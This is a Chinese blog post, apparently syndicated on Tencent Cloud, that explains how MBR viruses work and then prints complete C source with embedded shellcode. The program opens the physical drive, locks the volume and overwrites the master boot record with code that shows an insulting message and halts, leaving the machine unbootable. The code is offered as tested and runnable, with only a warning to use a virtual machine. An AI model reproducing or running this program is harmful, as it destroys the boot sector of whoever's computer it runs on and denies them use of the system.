C/C++ 揭秘MBR病毒如何运行
C/C++ 揭秘MBR病毒如何运行
微软技术分享
发布于 2022-12-28 17:46:07
发布于 2022-12-28 17:46:07
MBR全称主引导记录(Master Boot Record),整个硬盘最开头的512字节就是它。计算机启动后会先运行MBR里的代码进行各种状态的检查和初始化的工作,然后再把控制权转交给操作系统(简单地讲就是一个JMP指令跳到操作系统的起始代码),Windows就加载启动了。
MBR 病毒做的事就是直接把整个MBR覆盖掉,变成了它自己的代码,那么它想干什么都行了,只要它不主动交出代码执行流程,Windows绝没有启动的机会。
代码实现部分
此代码来自:https://www.cnblogs.com/xiongwei/p/9646017.html
经过测试,在 64 位系统中必须使用 x64 编译才有效果,运行完代码后重启,屏幕上就会出现一行红字: "I am virus! Fuck you 😃" ,一定要放在虚拟机里跑 ,不然会翻车的。
#include <windows.h>
#include <winioctl.h>
unsigned char scode[] =
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
/*
00000000 B81200 mov ax, 12H ; ah = 0, al = 12h (640 * 480)
00000003 CD10 int 10h ; 进入图形显示方式,隐藏光标
00000005 BD187C mov bp, Msg ; ES:BP = 串地址
00000008 B91800 mov cx, 18h ; CX = 串长度
0000000B B80113 mov ax, 1301h ; AH = 13, AL = 01h
0000000E BB0C00 mov bx, 000ch ; 页号为0(BH = 0) 黑底红字(BL = 0Ch,高亮)
00000011 BA1D0E mov dx, 0e1dh ; dh行, dl列
00000014 CD10 int 10h ; 10h 号中断
00000016 E2FE loop $
Msg: db "I am virus! Fuck you :-)"
*/
int main()
{
HANDLE hDevice;
DWORD dwBytesWritten, dwBytesReturned;
BYTE pMBR[512] = { 0 };
// 重新构造MBR
memcpy(pMBR, scode, sizeof(scode) - 1);
pMBR[510] = 0x55;
pMBR[511] = 0xAA;
hDevice = CreateFile
(
L"\\\\.\\PHYSICALDRIVE0",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
return -1;
DeviceIoControl
(
hDevice,
FSCTL_LOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NULL
);
// 写入病毒内容
WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
DeviceIoControl
(
hDevice,
FSCTL_UNLOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NULL
);
CloseHandle(hDevice);
return 0;
}本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021-07-16,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
腾讯云开发者
